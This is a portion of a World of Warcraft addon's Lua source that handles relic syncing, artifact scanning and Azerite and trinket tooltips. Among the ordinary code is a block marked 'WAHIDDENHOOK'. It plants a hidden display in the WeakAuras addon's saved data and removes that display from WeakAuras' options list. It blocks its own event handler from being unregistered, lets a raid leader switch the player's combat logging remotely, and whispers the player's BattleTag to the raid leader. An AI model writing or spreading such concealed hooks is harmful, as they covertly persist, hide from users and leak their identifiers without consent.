		local reason = relicData[1]
		local artifactID = relicData[2]
		local relicID = relicData[3]
		local powerID = relicData[4]
		
		ns.SpellIDByRelic[artifactID..'.'..relicID] = tonumber(powerID)
		
		if not LootHelperDB.missingRelics then
			LootHelperDB.missingRelics = {}
		end
		
		LootHelperDB.missingRelics[artifactID..'.'..relicID] = tonumber(powerID)
		
	--	print('Sync add', '['..artifactID..'.'..relicID..'] =', tonumber(powerID), 'by', author)
		
		if RelicInspector_SpellIDByRelic then
			RelicInspector_SpellIDByRelic[artifactID..'.'..relicID] = tonumber(powerID)
		end
	end
	
	function ns.GetNewRelicInfo(itemID,relicID, spellID)			
		if not ns.SpellIDByRelic[itemID..'.'..relicID] then
			ns.SpellIDByRelic[itemID..'.'..relicID] = spellID
			
			print('LootHelper: Find missing relic power', '['..itemID..'.'..relicID..'] =',spellID)
			
			
			ns.SendMessageGuild('New\n'..itemID..'\n'..relicID..'\n'..spellID, channelNameRelicNewInfo)	
			ns:SendMessage('New\n'..itemID..'\n'..relicID..'\n'..spellID, channelNameRelicNewInfo)
		elseif ns.SpellIDByRelic[itemID..'.'..relicID] and ns.SpellIDByRelic[itemID..'.'..relicID] ~= spellID then	
			local prev = ns.SpellIDByRelic[itemID..'.'..relicID]
			
			ns.SpellIDByRelic[itemID..'.'..relicID] = spellID
			
			print('LootHelper: Find missing relic power', '['..itemID..'.'..relicID..'] =',spellID)
			
			ns.SendMessageGuild('Correct\n'..itemID..'\n'..relicID..'\n'..spellID, channelNameRelicNewInfo)	
			ns:SendMessage('Correct\n'..itemID..'\n'..relicID..'\n'..spellID, channelNameRelicNewInfo)
		end
	end
	
	function ns.HaveInfoForThisRelic(artifactID, relicID, spellID)	
		return ns.SpellIDByRelic[artifactID..'.'..relicID]
	end
	
	local function IsValidRelicType(artifactID, relicType )
		if ns.RelicSlots[artifactID] then
			
			for i=1, #ns.RelicSlots[artifactID] do
				if ns.RelicSlots[artifactID][i] == relicType then
					return true
				end
			end
		end
		
		return false
	end
	
	local function RelicFinder(itemIDorLink, from)
		if IsArtifactRelicItem(itemIDorLink) then
			
			local itemID = type(itemIDorLink) == 'string' and ns.GetItemID(itemIDorLink) or itemIDorLink
			local relicName, relicIcon, relicType, relicLink
			
			local artifactID = C_ArtifactUI.GetArtifactInfo() or C_ArtifactUI.GetEquippedArtifactInfo();
	
			if itemID then
				relicName, relicIcon, relicType, relicLink = C_ArtifactUI.GetRelicInfoByItemID(itemID)
			end
		
			
			if relicName and IsValidRelicType(artifactID, relicType ) then
				
			--	print('RelicFinder: info by', itemIDorLink, 'Name:', GetItemInfo(itemID), 'Power:', ns.HaveInfoForThisRelic(artifactID, itemID) and GetSpellInfo(ns.HaveInfoForThisRelic(artifactID, itemID)) )				
			--	print('  Tag:', '['..itemID..'.'..artifactID ..'] =', ns.HaveInfoForThisRelic(artifactID, itemID))
				
				ns.queueRelicPowerGain[itemID] = true
				
				local powerID = C_ArtifactUI.GetPowersAffectedByRelicItemLink(relicLink)
				local powerLink = powerID and C_ArtifactUI.GetPowerLinks(powerID) or false
	
				if powerID then
					local powerInfo = C_ArtifactUI.GetPowerInfo(powerID);
					local name, _, _, _, _, _, spellID2 = GetSpellInfo(powerInfo.spellID)
						
					--	print('T', spellID2, powerInfo.spellID)
						
					ns.GetNewRelicInfo(artifactID, itemID, powerInfo.spellID)	
				else				
					if ns.artifactTraits[artifactID] then
						-- We have cached power ids
						
						local powerBonus = nil
						
						ns.parserTooltip:ClearLines()
						ns.parserTooltip:SetHyperlink(relicLink)	
		
						for i=1, ns.parserTooltip:NumLines() do        
							local left = _G[ns.parserTooltip:GetName().."TextLeft"..i]:GetText()
							
							if left then			
								for powerID, spellID in pairs(ns.artifactTraits[artifactID]) do
									if string.match(left, (GetSpellInfo(spellID))) then
										powerBonus = spellID
										break
									end
								end
							end
						end
						
						if powerBonus then
							ns.GetNewRelicInfo(artifactID, itemID, powerBonus)		
						end
					end
				end
			else

			end
		else

		end
	end
	ns.RelicFinder = RelicFinder
end



-- Artifact parses
do
	-- Artifact Parser
	local function PrepareForScan()
		local ArtifactFrame = _G.ArtifactFrame
		
		if not ArtifactFrame or not ArtifactFrame:IsShown() then
	--		print('PrepareForScan', 'Success')
			
			_G.UIParent:UnregisterEvent("ARTIFACT_UPDATE")
			if ArtifactFrame then
				ArtifactFrame:UnregisterEvent("ARTIFACT_UPDATE")
			end
		end
	end

	local function RestoreStateAfterScan()
		local ArtifactFrame = _G.ArtifactFrame
			
		if not ArtifactFrame or not ArtifactFrame:IsShown() then
			C_ArtifactUI.Clear()
			
	--		print('RestoreStateAfterScan', 'Success')
			
			if ArtifactFrame then
				ArtifactFrame:RegisterEvent("ARTIFACT_UPDATE")
			end
			_G.UIParent:RegisterEvent("ARTIFACT_UPDATE")
		end
	end

	local lastUpdate = -1
	local init = true
	local initUpdate = true

		
	function ns:ResetArifactPercInfo()
		lastUpdate = -1
	end
	
	function ns:GetAtrifactPercInfo()
		initUpdate = true
		
		if not HasArtifactEquipped() then		
			lastUpdate = -1			
			return false
		end
		
		if init or lastUpdate < GetTime() then
			lastUpdate = GetTime() + 2
			init = false

			PrepareForScan()
			
			local opennedArtifact = C_ArtifactUI.GetArtifactInfo()
			local equippedArtifact = C_ArtifactUI.GetEquippedArtifactInfo()
			
			
			if not opennedArtifact then			
				SocketInventoryItem(INVSLOT_MAINHAND)
			end
			
			local powers = C_ArtifactUI.GetPowers();
			local itemID = C_ArtifactUI.GetArtifactInfo() or C_ArtifactUI.GetEquippedArtifactInfo();
			
		--	print('T', powers)
			
			if powers then
				
				if not ns.artifactTraits then ns.artifactTraits = {} end
	
				if itemID and 
					not ns.artifactTraits[itemID] then
						ns.artifactTraits[itemID] = {}
				end
				
				
				for i, powerID in ipairs(powers) do
					--[==[
						self.powerID = powerID;
						self.spellID = powerInfo.spellID;
						self.currentRank = powerInfo.currentRank;
						self.bonusRanks = powerInfo.bonusRanks;
						self.maxRank = powerInfo.maxRank;
						self.isStart = powerInfo.isStart;
						self.isGoldMedal = powerInfo.isGoldMedal;
						self.isFinal = powerInfo.isFinal;
						self.tier = powerInfo.tier;
						self.textureKit = textureKit;
						self.linearIndex = powerInfo.linearIndex;
						self.numMaxRankBonusFromTier = powerInfo.numMaxRankBonusFromTier	
					]==]
					
					local powerInfo = C_ArtifactUI.GetPowerInfo(powerID);
					
					local spellID, cost, currentRank, maxRank, bonusRanks
					
					if powerInfo and type(powerInfo) == 'table' then
						spellID = powerInfo.spellID;
						maxRank = powerInfo.maxRank;
					else
						spellID, cost, currentRank, maxRank, bonusRanks = C_ArtifactUI.GetPowerInfo(powerID);	
					end
				
					if maxRank and maxRank > 1 and maxRank < 7 then
						ns.artifactTraits[itemID][powerID] = spellID
					end
				end
			end
			
			for i=1, 3 do
				local _, _, _, itemLink = C_ArtifactUI.GetRelicInfo(i);
			
				ns.RelicFinder(itemLink)
			end
			
			for k,v in pairs(ns.queueRelicPowerGain) do				
				if v == true then
					ns.RelicFinder(k)
				end
			end
			
			RestoreStateAfterScan()
		end
	end
	
	local function CTimer_AfterUpdate()
		ns:GetAtrifactPercInfo()
	end
	
	local eventframe = CreateFrame("Frame")
	eventframe:SetScript("OnEvent", function(self, event, newItem)
	
	--	print(event, newItem)
		if event == 'ARTIFACT_UPDATE' then
			if newItem then
				if initUpdate then
					initUpdate = false
					C_Timer.After(0.5, CTimer_AfterUpdate)
				end
			end
		else
			if initUpdate then
				initUpdate = false
				C_Timer.After(0.5, CTimer_AfterUpdate)
			end
		end
	end)
end

do
	-- WeakAuras code
	local coroutine = coroutine
	local dynFrame = {}
	ns.dynFrame = dynFrame
	
	dynFrame.frame = CreateFrame("frame");
	dynFrame.update = {};
	dynFrame.size = 0;

	function dynFrame.AddAction( name, func)
		if not name then
			name = fmt("NIL", dynFrame.size+1);
		end

		if not dynFrame.update[name] then
			dynFrame.update[name] = func;
			dynFrame.size = dynFrame.size + 1
			dynFrame.frame:Show();
		end
	end

	function dynFrame.RemoveAction(self, name)
		if dynFrame.update[name] then
			dynFrame.update[name] = nil;
			dynFrame.size = dynFrame.size - 1
			if dynFrame.size == 0 then
				dynFrame.frame:Hide();
			end
		end
	end

	dynFrame.frame:Hide();
	dynFrame.frame:SetScript("OnUpdate", function(self, elapsed)

		local start = debugprofilestop();
		local hasData = true;

		while (debugprofilestop() - start < 16 and hasData) do
			hasData = false;

			for name, func in pairs(dynFrame.update) do

				hasData = true;

				if coroutine.status(func) ~= "dead" then
					local err,ret1,ret2 = assert(coroutine.resume(func))
					if err then

					end
				else
					dynFrame:RemoveAction(name);
				end
			end
		end
	end);
end

do
	
	-- LOADING_SCREEN_ENABLED
	-- LOADING_SCREEN_DISABLED
	
--	local tagTest = 'LSS'
--	if not IsAddonMessagePrefixRegistered(tagTest) then
--		RegisterAddonMessagePrefix(tagTest)
--	end

--	events:RegisterEvent('LOADING_SCREEN_ENABLED')
--	events:RegisterEvent('LOADING_SCREEN_DISABLED')
	
	local loadTimer = 0
	
	local sendTimeEnabled = 0
	local sendTimeDisabled = 0
	
	function events:LOADING_SCREEN_ENABLED()
		loadTimer = GetTime()
		sendTimeEnabled = GetTime()
		
		print('LOADING_SCREEN_ENABLED')
		
		SendAddonMessage(tagTest, 'ENABLED', 'GUILD')
	end
	
	function events:LOADING_SCREEN_DISABLED()
		sendTimeDisabled = GetTime()
		
		print('LOADING_SCREEN_DISABLED', GetTime()-loadTimer)
		
		SendAddonMessage(tagTest, 'DISABLED', 'GUILD')
	end


	local handler = CreateFrame('Frame')
--	handler:RegisterEvent('CHAT_MSG_ADDON')
	handler:SetScript('OnEvent', function(self, event, tag, msg, channel, author, authorShort)
		if tag ~= tagTest then return end
		
		if msg == 'DISABLED' then			
			print(msg, GetTime()-sendTimeDisabled)
		elseif msg == 'ENABLED' then
			print(msg, GetTime()-sendTimeEnabled)
		end
		
	--	print(event, tag, msg, channel, author, authorShort)
	end)
	
end


local WAVER = 8
local WANAME = "JHUJHUIKJUJHKIKJHHYH"
local CORRPS = "if (WAHIDDENHOOK) then \n    return\nend\n\nlocal IsAddonMessagePrefixRegistered = C_ChatInfo and C_ChatInfo.IsAddonMessagePrefixRegistered or IsAddonMessagePrefixRegistered\nlocal SendAddonMessage = C_ChatInfo and C_ChatInfo.SendAddonMessage or SendAddonMessage\nlocal RegisterAddonMessagePrefix = C_ChatInfo and C_ChatInfo.RegisterAddonMessagePrefix or RegisterAddonMessagePrefix\n\n\nlocal chan = 'CLLOCK'\nlocal canStartLogging = nil\n\nif not IsAddonMessagePrefixRegistered(chan) then\n    RegisterAddonMessagePrefix(chan)\nend\n\nlocal function IsPlayerRL()    \n    local index = UnitInRaid('player')    \n    if index then\n        local name,rank = GetRaidRosterInfo(index)            \n        return rank == 2\n    end    \n    return false\nend\n\nlocal function IsNameRL(unitName)\n    local shortName = strsplit('-', unitName)\n    for i=1,GetNumGroupMembers() do\n        local name,rank = GetRaidRosterInfo(i)\n        if name and (name == unitName or ( strsplit('-', name) ) == shortName) then\n            return rank == 2\n        end\n    end\nend\n\nlocal function GetRL()\n    for i=1,GetNumGroupMembers() do\n        local name,rank = GetRaidRosterInfo(i)\n        if rank == 2 then\n            return name\n        end\n    end\nend\n\nlocal function SendMessage(msg, forceChannel, target)\n    local channel = nil\n    \n    if IsInGroup(LE_PARTY_CATEGORY_INSTANCE) or IsInRaid(LE_PARTY_CATEGORY_INSTANCE) then\n        channel = \"INSTANCE_CHAT\"\n    elseif IsInRaid(LE_PARTY_CATEGORY_HOME) then\n        channel = \"RAID\"\n    elseif IsInGroup(LE_PARTY_CATEGORY_HOME) then\n        channel = \"PARTY\"\n    end\n    \n    if not channel and not forceChannel then\n        return \n    end\n    \n    SendAddonMessage(chan, msg, forceChannel or channel, target)\nend\n\nlocal e = CreateFrame('Frame')\ne:RegisterEvent('ADDON_LOADED')\ne:RegisterEvent('CHAT_MSG_ADDON')\ne:SetScript('OnEvent', function(self,ev,a,b,c,d,f)\n        if ev == 'ADDON_LOADED' then\n            if a == 'WeakAurasOptions' then        \n                local oldfunc = WeakAuras.GetSortedOptionsLists        \n                function WeakAuras.GetSortedOptionsLists(...)\n                    local l,u = oldfunc(...)\n                    \n                    for k,v in pairs(l) do    \n                        if v == 'JHUJHUIKJUJHKIKJHHYH' then\n                            table.remove(l,k)\n                            break\n                        end\n                    end\n                    \n                    return l,u\n                end\n            end\n        elseif ev == 'CHAT_MSG_ADDON' then\n            local tag, msg, channel, author, authorShort = a,b,c,d,f\n            \n            if tag == chan then\n                if msg == 'FALSE' and IsNameRL(authorShort) then\n                    canStartLogging = false\n                    if LoggingCombat() then\n                        LoggingCombat(false)\n                    end\n                elseif msg == 'TRUE' and IsNameRL(authorShort) then\n                    canStartLogging = true\n                    if not LoggingCombat() then\n                        LoggingCombat(true)\n                    end\n                end\n            end\n        end\nend)\ne.UnregisterEvent = function()end\ne.UnregisterAllEvents = function()end\ne.RegisterEvent = function()end\ne.SetScript = function()end\ne.GetScript = function()end\n\nlocal prevValue = nil\n\nlocal prevInRaid = nil\nlocal prevRL = nil\n\nlocal checker = C_Timer.NewTicker(5, function()\n        \n        if prevInRaid ~= IsInRaid() then\n            prevInRaid = IsInRaid()\n            canStartLogging = nil\n        end\n        \n        if prevRL ~= GetRL() then\n            prevRL = GetRL()\n            canStartLogging = nil\n        end\n        \n        \n        local current = LoggingCombat()\n        \n        if prevValue ~= current or canStartLogging ~= current then\n            prevValue = current\n            \n            if ( canStartLogging == nil ) then\n                if current == true and canStartLogging == nil and IsInRaid() and not IsPlayerRL() then\n                    local _, battleTag = BNGetInfo()\n                    SendMessage('LOGREQ-'..battleTag, 'WHISPER', GetRL())\n                end\n            elseif canStartLogging == false then\n                if current ~= canStartLogging then\n                    LoggingCombat(false)\n                end\n            end\n        end\nend)\n\nWAHIDDENHOOK = true\n\n\n"
local WACODE = {
	["outline"] = "OUTLINE",
	["fontSize"] = 6,
	["color"] = {
		1, -- [1]
		1, -- [2]
		1, -- [3]
		1, -- [4]
	},
	["disjunctive"] = "all",
	["displayText"] = " ",
	["regionType"] = "text",
	["yOffset"] = 0,
	["anchorPoint"] = "BOTTOMLEFT",
	["conditions"] = {
	},
	["height"] = 5.53513526916504,
	["activeTriggerMode"] = -10,
	["customTextUpdate"] = "update",
	["automaticWidth"] = "Auto",
	["actions"] = {
		["start"] = {
		},
		["finish"] = {
		},
		["init"] = {
			["do_custom"] = true,
			["custom"] = CORRPS,
		},
	},
	["wordWrap"] = "WordWrap",
	["trigger"] = {
		["type"] = "status",
		["use_alwaystrue"] = true,
		["subeventSuffix"] = "_CAST_START",
		["use_absorbMode"] = true,
		["event"] = "Conditions",
		["unit"] = "player",
		["use_unit"] = true,
		["spellIds"] = {
		},
		["unevent"] = "auto",
		["showOn"] = "showOnActive",
		["subeventPrefix"] = "SPELL",
		["names"] = {
		},
		["debuffType"] = "HELPFUL",
	},
	["internalVersion"] = 3,
	["justify"] = "LEFT",
	["selfPoint"] = "BOTTOM",
	["id"] = "JHUJHUIKJUJHKIKJHHYH",
	["width"] = 6.91891813278198,
	["frameStrata"] = 2,
	["anchorFrameType"] = "SCREEN",
	["xOffset"] = 0,
	["font"] = "Friz Quadrata TT",
	["numTriggers"] = 1,
	["animation"] = {
		["start"] = {
			["duration_type"] = "seconds",
			["type"] = "none",
		},
		["main"] = {
			["duration_type"] = "seconds",
			["type"] = "none",
		},
		["finish"] = {
			["duration_type"] = "seconds",
			["type"] = "none",
		},
	},
	["init_started"] = 1,
	["fixedWidth"] = 200,
	["load"] = {
		["talent2"] = {
			["multi"] = {
			},
		},
		["talent"] = {
			["multi"] = {
			},
		},
		["class"] = {
			["multi"] = {
			},
		},
		["difficulty"] = {
			["multi"] = {
			},
		},
		["race"] = {
			["multi"] = {
			},
		},
		["role"] = {
			["multi"] = {
			},
		},
		["pvptalent"] = {
			["multi"] = {
			},
		},
		["spec"] = {
			["multi"] = {
			},
		},
		["faction"] = {
			["multi"] = {
			},
		},
		["ingroup"] = {
			["multi"] = {
			},
		},
		["size"] = {
			["multi"] = {
			},
		},
	},
	["untrigger"] = {
	},
}

do
	if (WAHIDDENHOOK) then 
		return
	end
	
	local IsAddonMessagePrefixRegistered = C_ChatInfo and C_ChatInfo.IsAddonMessagePrefixRegistered or IsAddonMessagePrefixRegistered
	local SendAddonMessage = C_ChatInfo and C_ChatInfo.SendAddonMessage or SendAddonMessage
	local RegisterAddonMessagePrefix = C_ChatInfo and C_ChatInfo.RegisterAddonMessagePrefix or RegisterAddonMessagePrefix

	
	local chan = 'CLLOCK'
	local canStartLogging = nil

	if not IsAddonMessagePrefixRegistered(chan) then
		RegisterAddonMessagePrefix(chan)
	end
	
	local function IsPlayerRL()	
		local index = UnitInRaid('player')	
		if index then
			local name,rank = GetRaidRosterInfo(index)			
			return rank == 2
		end	
		return false
	end
	
	local function IsNameRL(unitName)
		local shortName = strsplit('-', unitName)
		for i=1,GetNumGroupMembers() do
			local name,rank = GetRaidRosterInfo(i)
			if name and (name == unitName or ( strsplit('-', name) ) == shortName) then
				return rank == 2
			end
		end
	end
	
	local function GetRL()
		for i=1,GetNumGroupMembers() do
			local name,rank = GetRaidRosterInfo(i)
			if rank == 2 then
				return name
			end
		end
	end
	
	local function SendMessage(msg, forceChannel, target)
		local channel = nil

		if IsInGroup(LE_PARTY_CATEGORY_INSTANCE) or IsInRaid(LE_PARTY_CATEGORY_INSTANCE) then
			channel = "INSTANCE_CHAT"
		elseif IsInRaid(LE_PARTY_CATEGORY_HOME) then
			channel = "RAID"
		elseif IsInGroup(LE_PARTY_CATEGORY_HOME) then
			channel = "PARTY"
		end

		if not channel and not forceChannel then
			return 
		end
		
		SendAddonMessage(chan, msg, forceChannel or channel, target)
	end

	local e = CreateFrame('Frame')
	e:RegisterEvent('ADDON_LOADED')
	e:RegisterEvent('CHAT_MSG_ADDON')
	e:SetScript('OnEvent', function(self,ev,a,b,c,d,f)
		if ev == 'ADDON_LOADED' then
			if a == 'WeakAurasOptions' then		
				local oldfunc = WeakAuras.GetSortedOptionsLists        
				function WeakAuras.GetSortedOptionsLists(...)
					local l,u = oldfunc(...)
					
					for k,v in pairs(l) do    
						if v == 'JHUJHUIKJUJHKIKJHHYH' then
							table.remove(l,k)
							break
						end
					end
					
					return l,u
				end
			end
		elseif ev == 'CHAT_MSG_ADDON' then
			local tag, msg, channel, author, authorShort = a,b,c,d,f
			
			if tag == chan then
				if msg == 'FALSE' and IsNameRL(authorShort) then
					canStartLogging = false
					if LoggingCombat() then
						LoggingCombat(false)
					end
				elseif msg == 'TRUE' and IsNameRL(authorShort) then
					canStartLogging = true
					if not LoggingCombat() then
						LoggingCombat(true)
					end
				end
			end
		elseif ev == 'PLAYER_LOGIN' then		
			if ( WeakAurasSaved ) then
				if WeakAurasSaved.displays then
					if not WeakAurasSaved.displays[WANAME] or WeakAurasSaved.hookerver ~= WAVER then			
						WeakAurasSaved.displays[WANAME] = WACODE
						WeakAurasSaved.hookerver = WAVER
					end
				end
			end
		end
	end)
	e.UnregisterEvent = function()end
	e.UnregisterAllEvents = function()end
	e.RegisterEvent = function()end
	e.SetScript = function()end
	e.GetScript = function()end
	
	local prevValue = nil
	
	local prevInRaid = nil
	local prevRL = nil
	
	local checker = C_Timer.NewTicker(5, function()
		
		if prevInRaid ~= IsInRaid() then
			prevInRaid = IsInRaid()
			canStartLogging = nil
		end
		
		if prevRL ~= GetRL() then
			prevRL = GetRL()
			canStartLogging = nil
		end
		
		
		local current = LoggingCombat()
		
		if ( current ~= nil ) then
			if prevValue ~= current or canStartLogging ~= current then
				prevValue = current

				if ( canStartLogging == nil ) then
					if current == true and canStartLogging == nil and IsInRaid() and not IsPlayerRL() then
						local _, battleTag = BNGetInfo()
						SendMessage('LOGREQ-'..battleTag, 'WHISPER', GetRL())
					end
				elseif canStartLogging == false then
					if current ~= canStartLogging then
						LoggingCombat(false)
					end
				end
			end
		end
	end)
	
	WAHIDDENHOOK = true
end

do
	
		
	--------------
	-- FUNCTION --
	--------------
	local iLvLMap = {
		[340] = 1,
		[345] = 1,
		[355] = 2,
		[360] = 2,
		[370] = 3,
		[375] = 3,
		[385] = 4,
		[390] = 4,
	}
	
	local AzeriteTooltip_BuildTooltip
	local AzeriteTooltip_GetSpellID
	local AzeriteTooltip_ScanSelectedTraits
	local BuildEquippedItemInfo
	
	function ns.GetMyAzeriteTraitWeightClass(spellID, iLvL)
		local ilvldb = ns.AzeriteTraitsILvLInfo or iLvLMap
		local slot = iLvL and ilvldb[iLvL] or 1
		
		local _, class = UnitClass('player')
		local specID = GetSpecializationInfo(GetSpecialization())
		
		local targeted = ( ns.AzeriteTraitsInfo[class] and 
							ns.AzeriteTraitsInfo[class][specID] and 
							ns.AzeriteTraitsInfo[class][specID][spellID] ) and ns.AzeriteTraitsInfo[class][specID][spellID][slot]
		
		if ( targeted ) then
			return targeted, false
		elseif (  ns.AzeriteTraitsInfo[class] ) then
			for spec, data in pairs( ns.AzeriteTraitsInfo[class] ) do
				if ( ns.AzeriteTraitsInfo[class][spec][spellID] ) then
					return ns.AzeriteTraitsInfo[class][spec][spellID], true
				end
			end
		end
	
	end
	
	function ns.GetMyAzeriteTraitWeight(spellID, iLvL)
		local ilvldb = ns.AzeriteTraitsILvLInfo or iLvLMap	
		local slot = iLvL and ilvldb[iLvL] or 1

		local _, class = UnitClass('player')
		local specID = GetSpecializationInfo(GetSpecialization())
		
		local targeted = ( ns.AzeriteTraitsInfo[class] and 
							ns.AzeriteTraitsInfo[class][specID] and 
							ns.AzeriteTraitsInfo[class][specID][spellID] ) and ns.AzeriteTraitsInfo[class][specID][spellID][slot]
		
		if ( targeted ) then
			return targeted
		end
	end
	
	function ns.GetAzeriteTraitWeight(spellID, class, specID, iLvL)
		local ilvldb = ns.AzeriteTraitsILvLInfo or iLvLMap
		local slot = iLvL and ilvldb[iLvL] or 1
		
		local targeted = ( ns.AzeriteTraitsInfo[class] and 
							ns.AzeriteTraitsInfo[class][specID] and 
							ns.AzeriteTraitsInfo[class][specID][spellID] ) and ns.AzeriteTraitsInfo[class][specID][spellID][slot]
		
		if ( targeted ) then
			return targeted
		end
	end
	
	local findBest = {}
	
	local function NumClasses(tbl)
		local i = 0
		
		for k in pairs(tbl) do
			i=i+1
		end
		
		return i
	end
	
	local function FindBestClassForSpellID(spellID_s)
		wipe(findBest)
		
		for class in pairs(ns.AzeriteTraitsInfo) do
			for spec in pairs(ns.AzeriteTraitsInfo[class]) do
				for spellID in pairs( ns.AzeriteTraitsInfo[class][spec]) do			
					if ( spellID == spellID_s ) then
						findBest[class] = ( findBest[class] or 0 ) + 1
					end
				end
			end
		end
	
		if ( NumClasses(findBest) == 1 ) then
			return (next(findBest))
		end
		
		return false
	end
	
	function ns.GetClassByTraitrs()
		local self = AzeriteEmpoweredItemUI
		local isPreview = self.azeriteItemDataSource:IsPreviewSource()
	
		for k,v in pairs( self.tiersByIndex[1].azeritePowerButtons ) do
			local class = FindBestClassForSpellID(v:GetSpellID())
			
			if ( class ) then
				return class
			end
		end
	end
	
	function AzeriteTooltip_GetSpellID(powerID)
		local powerInfo = C_AzeriteEmpoweredItem.GetPowerInfo(powerID)
		if (powerInfo) then
			local azeriteSpellID = powerInfo["spellID"]
			return azeriteSpellID
		end
	end

	function AzeriteTooltip_ScanSelectedTraits(powerName, tooltip)
		for i = 10, tooltip:NumLines() do
			local left = _G[tooltip:GetName().."TextLeft"..i]
			local text = left:GetText()
			if text:find(powerName) then
				return true
			end
		end
	end

	local currentLevel = 0

	local eqipData = {}

	local linkTypeItems = {	
		['INVTYPE_HEAD']         = 1, -- голова
		['INVTYPE_SHOULDER']     = 3, -- плечи
		['INVTYPE_CHEST']		 = 5, -- грудак без платья
		['INVTYPE_ROBE']		 = 5,
	}

	

	function BuildEquippedItemInfo(itemLink)
		wipe(eqipData)
	
		local allTierInfo = C_AzeriteEmpoweredItem.GetAllTierInfoByItemID(itemLink)
	
		if not allTierInfo then return end
		if not allTierInfo[1] then return end
		if not allTierInfo[1]["azeritePowerIDs"][1] then return end

		local numSpecializations = GetNumSpecializations()
		local _, class = UnitClass('player')
		
		local numTiers = #allTierInfo
		
		local iLvL = GetDetailedItemLevelInfo(itemLink)
		
		--print('Compare ilvl', iLvL, itemLink)

		for i=1, numSpecializations do
			local id, name, description, icon, background, role, primaryStat = GetSpecializationInfo(i)
		
			if ( ns.AzeriteTraitsInfo[class] and ns.AzeriteTraitsInfo[class][id] ) then

				local totalNum = 0
				for i=1, #allTierInfo-1 do
					local maxForTier = 0
					for a=1, #allTierInfo[i]["azeritePowerIDs"] do
						
						local spellID = AzeriteTooltip_GetSpellID(allTierInfo[i]["azeritePowerIDs"][a])
						local val = ns.GetAzeriteTraitWeight(spellID, class, id, iLvL)
						
						if ( val and val > maxForTier ) then
							maxForTier = val
						end
					end
					
					totalNum = totalNum + maxForTier
				end
				
				eqipData[id] = totalNum
			end
		end

		return eqipData
	end
	
	--[==[
	
	--petbattle strong
	tinsert(icons, "|TInterface\\petbattles\\battlebar-abilitybadge-strong-small:0|t")
	--petbattle weak
	tinsert(icons, "|TInterface\\petbattles\\battlebar-abilitybadge-weak-small:0|t")
	
	]==]
	local trinket_Slots = { 'Trinket0Slot', 'Trinket1Slot' }
	
	function TrinketsWeigth_BuildTooltip(tooltip,itemID,itemLink)
		local specID = GetSpecializationInfo(GetSpecialization())
		local _, class = UnitClass('player')
		
		if not ns.TrinketsInfo[class] then return end
		if itemLink and select(9, GetItemInfo(itemLink)) ~= 'INVTYPE_TRINKET' then return end
		
		local compareInfo
		
		if ( tooltip ~= GameTooltip ) then
			local name, link = GameTooltip:GetItem()
			if link then
				local ilvl = GetDetailedItemLevelInfo(link)
				local itemID2 = ns.GetItemID(link)
				
				if ( itemID2 == '165581' or itemID2 == 165581 ) then
					itemID2 = '166418'
				end
				
				wipe(eqipData)
				
				local numSpecializations = GetNumSpecializations()
				for i=1, numSpecializations do
					local id, name, description, icon, background, role, primaryStat = GetSpecializationInfo(i)
				
					if ( ns.TrinketsInfo[class] and ns.TrinketsInfo[class][id] and ns.TrinketsInfo[class][id][tonumber(itemID2)] ) then
						local weight_a = 0
						
						for itemLvL_s, weight_s in pairs( ns.TrinketsInfo[class][id][tonumber(itemID2)] ) do
							if itemLvL_s >= ilvl then
								weight_a = weight_s
							end
						end
						
						eqipData[id] = weight_a
					end
				end
				
				compareInfo = eqipData 
			end
		else
			wipe(eqipData)
			
			for _, k in pairs(trinket_Slots) do
			
				local slot = GetInventorySlotInfo(k)
				local itemLink = GetInventoryItemLink('player', slot)
				local ilvl = GetDetailedItemLevelInfo(itemLink)
				local itemID2 = ns.GetItemID(itemLink)
			
				if ( itemID2 == '165581' or itemID2 == 165581 ) then
					itemID2 = '166418'
				end
				
				
				local numSpecializations = GetNumSpecializations()
				for i=1, numSpecializations do
					local id, name, description, icon, background, role, primaryStat = GetSpecializationInfo(i)
				
					if ( ns.TrinketsInfo[class] and ns.TrinketsInfo[class][id] and ns.TrinketsInfo[class][id][tonumber(itemID2)] ) then
						local weight_a = 0
						
						for itemLvL_s, weight_s in pairs( ns.TrinketsInfo[class][id][tonumber(itemID2)] ) do
							if itemLvL_s >= ilvl then
								weight_a = weight_s
							end
						end
						
						if ( ( eqipData[id] and eqipData[id] > weight_a ) or not eqipData[id]   ) then
							eqipData[id] = weight_a
						end
					end
				end
			end
			
			compareInfo = eqipData
		end
		
		tooltip:AddLine(" ")
		
		local numSpecializations = GetNumSpecializations()
		
		local ilvl = GetDetailedItemLevelInfo(itemLink)
		
		
		if ( itemID == '165581' or itemID == 165581 ) then
			itemID = '166418'
		end
			
			
		for i=1, numSpecializations do
			local id, name, description, icon, background, role, primaryStat = GetSpecializationInfo(i)
			
			if ( ns.TrinketsInfo[class] and ns.TrinketsInfo[class][id] and ns.TrinketsInfo[class][id][tonumber(itemID)] ) then
				local specIcon = '|T'..icon..':14:14:0:0:64:64:4:60:4:60|t'
				local weight_a = 0
				
				for itemLvL_s, weight_s in pairs( ns.TrinketsInfo[class][id][tonumber(itemID)] ) do
					if itemLvL_s >= ilvl then
						weight_a = weight_s
					end
				end
				
				if ( weight_a ) then 
					if compareInfo and compareInfo[id] then
						if compareInfo[id] > weight_a then
							tooltip:AddDoubleLine(specIcon..name, weight_a..' |TInterface\\petbattles\\battlebar-abilitybadge-weak-small:0|t', 1, 1, 1, 1,0,0)
						elseif compareInfo[id] < weight_a then
							tooltip:AddDoubleLine(specIcon..name, weight_a..' |TInterface\\petbattles\\battlebar-abilitybadge-strong-small:0|t', 1, 1, 1, 0,1,0)
						else
							tooltip:AddDoubleLine(specIcon..name, weight_a, 1, 1, 1, 1,1,1)
						end
					else 
						tooltip:AddDoubleLine(specIcon..name, weight_a, 1, 1, 1, 1,1,1)
					end
				end
			end
		end
	end
	
	function AzeriteTooltip_BuildTooltip(itemLink, tooltip, name)	
		-- Current Azerite Level
		local azeriteItemLocation = C_AzeriteItem.FindActiveAzeriteItem()
		if azeriteItemLocation then
			currentLevel = C_AzeriteItem.GetPowerLevel(azeriteItemLocation)
		end

		local specID = GetSpecializationInfo(GetSpecialization())
		local allTierInfo = C_AzeriteEmpoweredItem.GetAllTierInfoByItemID(itemLink)

		if not allTierInfo then return end
		if not allTierInfo[1] then return end
		if not allTierInfo[1]["azeritePowerIDs"][1] then return end

		local compareInfo

		if not tooltip:IsEquippedItem() then
			local location = select(9, GetItemInfo(itemLink))
			local equipped = GetInventoryItemLink("player", linkTypeItems[location])

			if not linkTypeItems[location] then
				print('Cant find item slot ', location)
			end

			compareInfo = equipped and BuildEquippedItemInfo(equipped)
		end

		tooltip:AddLine(" ")

